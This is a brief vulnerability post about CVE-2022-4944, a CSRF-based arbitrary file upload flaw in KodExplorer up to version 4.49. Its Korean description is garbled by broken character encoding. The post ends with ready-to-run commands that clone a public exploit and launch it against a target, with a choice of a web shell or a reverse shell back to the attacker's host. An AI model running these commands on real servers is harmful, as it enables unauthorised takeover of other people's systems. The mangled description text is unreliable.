
ใ๐ฅใCVE-2022-4944: KodExplorer <= 4.49 - CSRF๋ฅผ ํตํ ์์ ํ์ผ ์ ๋ก๋

kalcaddle KodExplorer 4.49๊น์ง์์ ๋ฌธ์ ๋ก ๋ถ๋ฅ๋ ์ทจ์ฝ์ ์ด ๋ฐ๊ฒฌ๋์์ต๋๋ค. ์ด๋ ์ ์ ์๋ ๋ถ๋ถ์ ์ํฅ์ ๋ฏธ์นฉ๋๋ค. ์ด ์กฐ์์ผ๋ก ์ธํด ๊ต์ฐจ ์ฌ์ดํธ ์์ฒญ ์์กฐ๊ฐ ๋ฐ์ํฉ๋๋ค. ์ด ์ทจ์ฝ์ ์ CVE-2022-4944๋ก ๊ณ ์ ํ๊ฒ ์๋ณ๋ฉ๋๋ค. ์๊ฒฉ์ผ๋ก ๊ณต๊ฒฉ์ ์์ํ ์ ์์ต๋๋ค. ๋ํ, ์ต์คํ๋ก์์ด ์กด์ฌํฉ๋๋ค. ์ํฅ์ ๋ฐ๋ ๊ตฌ์ฑ ์์๋ฅผ ์ ๊ทธ๋ ์ด๋ํ๋ ๊ฒ์ด ๊ถ์ฅ๋ฉ๋๋ค.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode